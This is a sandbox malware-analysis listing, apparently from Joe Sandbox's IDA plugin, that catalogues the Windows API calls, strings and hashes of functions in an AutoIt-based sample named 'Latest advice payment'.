                                                            • Opcode Fuzzy Hash: 7986497437708410a7ad847fc46c10bcf6ba076b0b27159fe25d6f3c45e0b7b9
                                                            • Instruction Fuzzy Hash: 5C71AD34600684AFEF299F56C8D5FBB7FB6FF09301F104469E982972A2C732A940DB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 005DF448
                                                            • _memset.LIBCMT ref: 005DF511
                                                            • ShellExecuteExW.SHELL32(?), ref: 005DF556
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 005DF5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 005DF5FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: f65a1325707c0a839f2e609beffdab2d6fd41dd139f0067266e14b3a6ad31dcf
                                                            • Instruction ID: 0936bb362f98f684fa8692737517b6e06946715c0f08eed77b1ff7df78416f58
                                                            • Opcode Fuzzy Hash: f65a1325707c0a839f2e609beffdab2d6fd41dd139f0067266e14b3a6ad31dcf
                                                            • Instruction Fuzzy Hash: 01616D75A0061ADFCF14EF98C4859AEBFB5FF89310F14846AE856AB351CB30AD41CB90
                                                            APIs
                                                            • GetParent.USER32(?), ref: 005C0F8C
                                                            • GetKeyboardState.USER32(?), ref: 005C0FA1
                                                            • SetKeyboardState.USER32(?), ref: 005C1002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 005C1030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 005C104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 005C1095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005C10B8
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 0e255aac45082183db4f29e0604ee922806b4d8556e4d448ab6378c20ed96c95
                                                            • Instruction ID: ef18224e75379c8cfe3f0920ecf58b091044aa00a58c05fd024fe201f0ce5151
                                                            • Opcode Fuzzy Hash: 0e255aac45082183db4f29e0604ee922806b4d8556e4d448ab6378c20ed96c95
                                                            • Instruction Fuzzy Hash: EC51D160504AD57EFB3642B48C59FBABEA97B07304F08858DE1D5958C3C298ACC8D755
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 005C0DA5
                                                            • GetKeyboardState.USER32(?), ref: 005C0DBA
                                                            • SetKeyboardState.USER32(?), ref: 005C0E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005C0E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005C0E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005C0EA8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005C0EC9
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 3295af303ec311fe2a279dccf017f690e3ec1d95b0d532867f918051c030616f
                                                            • Instruction ID: 146020483c01e66dada1cb286223be1d0c94763798e22d3613b64c4a9bb33e85
                                                            • Opcode Fuzzy Hash: 3295af303ec311fe2a279dccf017f690e3ec1d95b0d532867f918051c030616f
                                                            • Instruction Fuzzy Hash: A651F4A05487D5BDFB3683B48C55F7ABFA97B06300F08988DE1D54A8C3C795AC98E760
                                                            APIs
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 292ea9acc8eecbb7e8fe8ff2d41f6cb806d87842d05f0cf767a3fa244aa70bc9
                                                            • Instruction ID: 60513d0f06905d8e59171b758c9ed4f4a8dcc90420e5274be0d85e97e5aa31bc
                                                            • Opcode Fuzzy Hash: 292ea9acc8eecbb7e8fe8ff2d41f6cb806d87842d05f0cf767a3fa244aa70bc9
                                                            • Instruction Fuzzy Hash: E3418275C11615B6CB11FBF4884AACFBBB8BF44350F508956ED08F3221FA34A685C7A6
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005BD5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005BD60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005BD61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005BD69D
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,_$DllGetClassObject
                                                            • API String ID: 753597075-3938553195
                                                            • Opcode ID: 322994d56976fe31beec337dabff49344a7af8b741749d74556cba43e548cefb
                                                            • Instruction ID: e1f6982bf62749ea7b302753a4115c85cb576fed39888872d13bb3ce8dce8e02
                                                            • Opcode Fuzzy Hash: 322994d56976fe31beec337dabff49344a7af8b741749d74556cba43e548cefb
                                                            • Instruction Fuzzy Hash: 9D418EB5600209EFDB05CF54C884AEA7FB9FF48310F1580A9AD099F205EBB5E944DBB0
                                                            APIs
                                                              • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005C3697,?), ref: 005C468B
                                                              • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005C3697,?), ref: 005C46A4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 005C36B7
                                                            • _wcscmp.LIBCMT ref: 005C36D3
                                                            • MoveFileW.KERNEL32(?,?), ref: 005C36EB
                                                            • _wcscat.LIBCMT ref: 005C3733
                                                            • SHFileOperationW.SHELL32(?), ref: 005C379F
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: 1d7499f9e8961fc221d3c4bc500f8ec36293c47956d80d7d088e541f98ddc40b
                                                            • Instruction ID: eb21863ea6778a431960f0902ebd13b00479b10fb4e7a5cfa1b2250bc49f4690
                                                            • Opcode Fuzzy Hash: 1d7499f9e8961fc221d3c4bc500f8ec36293c47956d80d7d088e541f98ddc40b
                                                            • Instruction Fuzzy Hash: 6A417FB1508349AEC751EFA4C855EDF7BE8FF88380F00582EB499C7251EA34D689CB52
                                                            APIs
                                                            • _memset.LIBCMT ref: 005E72AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005E7351
                                                            • IsMenu.USER32(?), ref: 005E7369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005E73B1
                                                            • DrawMenuBar.USER32 ref: 005E73C4
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 059c554f2177ca9ebe44316c08d86d5562e9c504a11c4f2d59290d827f0c6fac
                                                            • Instruction ID: d122762c33f1f3899dfb58c47532eabac913faa3fc5c63bbc9b68418967f6b42
                                                            • Opcode Fuzzy Hash: 059c554f2177ca9ebe44316c08d86d5562e9c504a11c4f2d59290d827f0c6fac
                                                            • Instruction Fuzzy Hash: 1B415B75A00289EFDB24DF51D884AAABBF5FB0C310F14882AFD859B250C730AD10DF60
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 005E0FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E0FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 005E10B5
                                                              • Part of subcall function 005E0FA5: RegCloseKey.ADVAPI32(?), ref: 005E101B
                                                              • Part of subcall function 005E0FA5: FreeLibrary.KERNEL32(?), ref: 005E106D
                                                              • Part of subcall function 005E0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005E1090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 005E1058
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: 8fe27db2910a04b3035152885cbe5f31bf800d8955c6dfc98b8594eba664ea60
                                                            • Instruction ID: e8aa84eddf875bef7b0afded3ba1b8155170f00f8881c8a2aa7aee85281d1bd7
                                                            • Opcode Fuzzy Hash: 8fe27db2910a04b3035152885cbe5f31bf800d8955c6dfc98b8594eba664ea60
                                                            • Instruction Fuzzy Hash: 5D313A71D01149BFDB189F91DC89EFFBBBCFF08310F00016AE552A2141EA709E899BA4
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005E62EC
                                                            • GetWindowLongW.USER32(01076498,000000F0), ref: 005E631F
                                                            • GetWindowLongW.USER32(01076498,000000F0), ref: 005E6354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 005E6386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005E63B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 005E63C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005E63DB
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 868aa0252fff849bcc75370490e63f5a3a560c8e7c43a0a67488affffa6b853a
                                                            • Instruction ID: 2850a835ed513e7e3141433cacb1349b2ce72e85d0d0f7a0a13f86dc9e2fed1b
                                                            • Opcode Fuzzy Hash: 868aa0252fff849bcc75370490e63f5a3a560c8e7c43a0a67488affffa6b853a
                                                            • Instruction Fuzzy Hash: 3F312330640690AFDB38CF1ADC88F583BE1FB6A794F1805A4F591CF2B2CB71A8449B51
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDB2E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDB54
                                                            • SysAllocString.OLEAUT32(00000000), ref: 005BDB57
                                                            • SysAllocString.OLEAUT32(?), ref: 005BDB75
                                                            • SysFreeString.OLEAUT32(?), ref: 005BDB7E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 005BDBA3
                                                            • SysAllocString.OLEAUT32(?), ref: 005BDBB1
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 641303b8935aff8bc55a037ae5293007e983f9e6486ef992974e592a37fd7a2c
                                                            • Instruction ID: b12374f0efebe7c6ade83c0c7eb9335dd2f2eef4061fe8757697a6fb4c67a310
                                                            • Opcode Fuzzy Hash: 641303b8935aff8bc55a037ae5293007e983f9e6486ef992974e592a37fd7a2c
                                                            • Instruction Fuzzy Hash: 32219536600219AFDF10EFA8DC88CFB77ACFB09360B018565F954DB290EA70AD459B70
                                                            APIs
                                                              • Part of subcall function 005D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005D7DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005D61C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D61D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005D620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 005D6217
                                                            • WSAGetLastError.WSOCK32 ref: 005D6221
                                                            • closesocket.WSOCK32(00000000), ref: 005D624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005D6263
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: 58dfd1d4c833e52eb319fbc261fd4f5d6fb6761af4aba84fa1443c62844c3bf1
                                                            • Instruction ID: 9c61e022e9b7b08da7bf9e75d891f6a20afff4fad106060870685ca69a03ae24
                                                            • Opcode Fuzzy Hash: 58dfd1d4c833e52eb319fbc261fd4f5d6fb6761af4aba84fa1443c62844c3bf1
                                                            • Instruction Fuzzy Hash: 9031A675600118ABEF20AF64CC89BBD7BADFB85710F04442AFD459B291DB74AC05DBA1
                                                            APIs
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: b92f8a27980b25d58684804eb9a50e571035578f9167bd8e044d71ea719064a1
• Instruction ID: 4727295b3ec55c73d49569e0013358e0857d5a9138d729084a55e1ac810bdda4
• Opcode Fuzzy Hash: b92f8a27980b25d58684804eb9a50e571035578f9167bd8e044d71ea719064a1
• Instruction Fuzzy Hash: 332134B220511266D321BA34AC06EFBBF98FF95740F10443AFD46960A1EF50BE42C395
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDC09
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDC2F
• SysAllocString.OLEAUT32(00000000), ref: 005BDC32
• SysAllocString.OLEAUT32 ref: 005BDC53
• SysFreeString.OLEAUT32 ref: 005BDC5C
• StringFromGUID2.OLE32(?,?,00000028), ref: 005BDC76
• SysAllocString.OLEAUT32(?), ref: 005BDC84
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 9dc4a1e1713920869befc47370cc636d080e5f385edb9fe0ed4088f6ccd1450c
• Instruction ID: 21061b5992629d74f32d53709213dfde6d8331032a908859cb8dd9f20e28db40
• Opcode Fuzzy Hash: 9dc4a1e1713920869befc47370cc636d080e5f385edb9fe0ed4088f6ccd1450c
• Instruction Fuzzy Hash: 22216535604205AF9B14AFA8DC88DBB7BACFB18360B108125F954CB2A1EA70EC45DB74
APIs
  • Part of subcall function 00561D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00561D73
  • Part of subcall function 00561D35: GetStockObject.GDI32(00000011), ref: 00561D87
  • Part of subcall function 00561D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00561D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005E7632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005E763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005E764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005E7659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005E7665
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 331213ed94cd8dd2cfa4e9a81acae1e08c2e1ecd78d510ad821297013595a953
• Instruction ID: a02a86143e93249f33a0dbc036cbc84e67d545298433d28b372df6b4ba100ec5
• Opcode Fuzzy Hash: 331213ed94cd8dd2cfa4e9a81acae1e08c2e1ecd78d510ad821297013595a953
• Instruction Fuzzy Hash: F1118EB215021ABFEF159F65CC85EE77F6DFF08798F014115BA44A60A0CA729C21DBA4
APIs
• __init_pointers.LIBCMT ref: 00589AE6
  • Part of subcall function 00583187: EncodePointer.KERNEL32(00000000), ref: 0058318A
  • Part of subcall function 00583187: __initp_misc_winsig.LIBCMT ref: 005831A5
  • Part of subcall function 00583187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00589EA0
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00589EB4
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00589EC7
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00589EDA
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00589EED
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00589F00
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00589F13
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00589F26
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00589F39
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00589F4C
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00589F5F
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00589F72
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00589F85
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00589F98
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00589FAB
  • Part of subcall function 00583187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00589FBE
• __mtinitlocks.LIBCMT ref: 00589AEB
• __mtterm.LIBCMT ref: 00589AF4
  • Part of subcall function 00589B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00589AF9,00587CD0,0061A0B8,00000014), ref: 00589C56
  • Part of subcall function 00589B5C: _free.LIBCMT ref: 00589C5D
  • Part of subcall function 00589B5C: DeleteCriticalSection.KERNEL32(02b,?,?,00589AF9,00587CD0,0061A0B8,00000014), ref: 00589C7F
• __calloc_crt.LIBCMT ref: 00589B19
• __initptd.LIBCMT ref: 00589B3B
• GetCurrentThreadId.KERNEL32 ref: 00589B42
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: 788a59ab2dffc6437d308787d88a2f602eea037cc38b3daf18dce0a6109b5953
• Instruction ID: e2ed12d4a46823d59b2f3b79b261a11c1e2117522f22f04946543c3e28cfe4cd
• Opcode Fuzzy Hash: 788a59ab2dffc6437d308787d88a2f602eea037cc38b3daf18dce0a6109b5953
• Instruction Fuzzy Hash: 78F0623260A71359E7287674BC0B6BA3E91FB82731B284A1AFC50F60D2EE2198414764
APIs
• _memset.LIBCMT ref: 005EB644
• _memset.LIBCMT ref: 005EB653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00626F20,00626F64), ref: 005EB682
• CloseHandle.KERNEL32 ref: 005EB694
Strings
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: ob$dob
• API String ID: 3277943733-1775653833
• Opcode ID: 73f5cd20225ee08da46e155d85514fd1eaf6902b217a07820e5c05396cff88e7
• Instruction ID: c284eed5760c4cb400559daa4795e422f2b186608c2b7282d839f302a21387aa
• Opcode Fuzzy Hash: 73f5cd20225ee08da46e155d85514fd1eaf6902b217a07820e5c05396cff88e7
• Instruction Fuzzy Hash: 79F089B15407517BF7102B61FD45F7B3E9EEB08355F005420FA48E9595D7714C018BB8
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00583F85), ref: 00584085
• GetProcAddress.KERNEL32(00000000), ref: 0058408C
• EncodePointer.KERNEL32(00000000), ref: 00584097
• DecodePointer.KERNEL32(00583F85), ref: 005840B2
Strings
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: c87a24f8e975123206028959b9793832a4e1acf451bed219d07e3772b0d97a73
• Instruction ID: 1c9e0cf4033888dc155e09c28ccdfa8fc6e6ba63b486cce78b530c7e8ecb797e
• Opcode Fuzzy Hash: c87a24f8e975123206028959b9793832a4e1acf451bed219d07e3772b0d97a73
• Instruction Fuzzy Hash: EEE08670645700DFEB24AF60EC4DB013EA5B718742F005424FA41E91A0CF7B4215EF10
APIs
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
• Instruction ID: c143f6be8f356fc28f22a87c0bb2b80b705ad258982fc2672c327381e86de257
• Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
• Instruction Fuzzy Hash: 2061473050065A9FCF01EFA4C88AEBE3FA9BF85308F444919FD556B292DA34A945CB51
APIs
  • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
  • Part of subcall function 005E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E02BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E02FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 005E0320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005E0349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 005E038C
• RegCloseKey.ADVAPI32(00000000), ref: 005E0399
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: eb64dc2d6e0a8884204613eb616b517fed89402433faa08beda9f14eb1f15b63
• Instruction ID: ec9534175df7cfbaee1efa7c4ca5b0991eb31eb4b57e81d5e78a0654907ce99f
• Opcode Fuzzy Hash: eb64dc2d6e0a8884204613eb616b517fed89402433faa08beda9f14eb1f15b63
• Instruction Fuzzy Hash: A9515A311083459FC718EF64C889E6EBBE8FF88314F44491DF5858B2A2DB71E949CB52
APIs
• GetMenu.USER32(?), ref: 005E57FB
• GetMenuItemCount.USER32(00000000), ref: 005E5832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005E585A
• GetMenuItemID.USER32(?,?), ref: 005E58C9
• GetSubMenu.USER32(?,?), ref: 005E58D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 005E5928
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: fb1e832b1e6508d29b36db55e16a8d888ae56a7c3bea730d351e629b845cd2e8
• Instruction ID: d026f38910b6491ca0cad9f30de40572a5f0947b89173728d43878414c256d84
• Opcode Fuzzy Hash: fb1e832b1e6508d29b36db55e16a8d888ae56a7c3bea730d351e629b845cd2e8
• Instruction Fuzzy Hash: 65515C35A00656EFCF19EFA5C845AAEBBB4FF48314F104469E881BB351DB30AE41DB90
APIs
• VariantInit.OLEAUT32(?), ref: 005BEF06
• VariantClear.OLEAUT32(00000013), ref: 005BEF78
• VariantClear.OLEAUT32(00000000), ref: 005BEFD3
• _memmove.LIBCMT ref: 005BEFFD
• VariantClear.OLEAUT32(?), ref: 005BF04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005BF078
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: dfe125f732499222253c8bdec13a417e4a99bf179434aae6f217d8e461357db5
• Instruction ID: d6740e53c3b26f61a90129837e3c922ebeb39a8e1d11f90476a82fa222586958
• Opcode Fuzzy Hash: dfe125f732499222253c8bdec13a417e4a99bf179434aae6f217d8e461357db5
• Instruction Fuzzy Hash: AE516AB5A00209EFCB14DF58C884AAABBB8FF4C314B158569ED59DB351E734E911CFA0
APIs
• _memset.LIBCMT ref: 005C2258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C22A3
• IsMenu.USER32(00000000), ref: 005C22C3
• CreatePopupMenu.USER32 ref: 005C22F7
• GetMenuItemCount.USER32(000000FF), ref: 005C2355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 005C2386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 2fb0e438846a7d537e8928a265ad006b2d71085d1694092a75e878dacc3c3ed3
                                                            • Instruction ID: 68ae4a3274dc3d824c17dbc1aff90a6028dc981b3beaf8737c91105608734f0f
                                                            • Opcode Fuzzy Hash: 2fb0e438846a7d537e8928a265ad006b2d71085d1694092a75e878dacc3c3ed3
                                                            • Instruction Fuzzy Hash: 8951897060028ADFDF25CFA8C988FAEBFF5BF55B14F10492DE851AA290D7748905CB51
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0056179A
                                                            • GetWindowRect.USER32(?,?), ref: 005617FE
                                                            • ScreenToClient.USER32(?,?), ref: 0056181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0056182C
                                                            • EndPaint.USER32(?,?), ref: 00561876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 03382e779f080c5cd394fc4122ad597fda48b8895ada9a7a8cb4ba2fe36ed511
                                                            • Instruction ID: 5f8ad101e67621792897ecd85058944966221fb58f596876c6dda37367853c12
                                                            • Opcode Fuzzy Hash: 03382e779f080c5cd394fc4122ad597fda48b8895ada9a7a8cb4ba2fe36ed511
                                                            • Instruction Fuzzy Hash: C441C130100B119FDB20DF25DC88FBA7FE9FB59324F084668F5A58B2A1CB709845DB61
                                                            APIs
                                                            • ShowWindow.USER32(006257B0,00000000,01076498,?,?,006257B0,?,005EB5A8,?,?), ref: 005EB712
                                                            • EnableWindow.USER32(00000000,00000000), ref: 005EB736
                                                            • ShowWindow.USER32(006257B0,00000000,01076498,?,?,006257B0,?,005EB5A8,?,?), ref: 005EB796
                                                            • ShowWindow.USER32(00000000,00000004,?,005EB5A8,?,?), ref: 005EB7A8
                                                            • EnableWindow.USER32(00000000,00000001), ref: 005EB7CC
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 005EB7EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: edfacf0dd637b63e679ea2bd284fcf2a4f81808142ba943426df687a43a59520
                                                            • Instruction ID: fbc74f850393a74c9088a2bca5912280ca33b320070b4855a9f2d8aeb90f6273
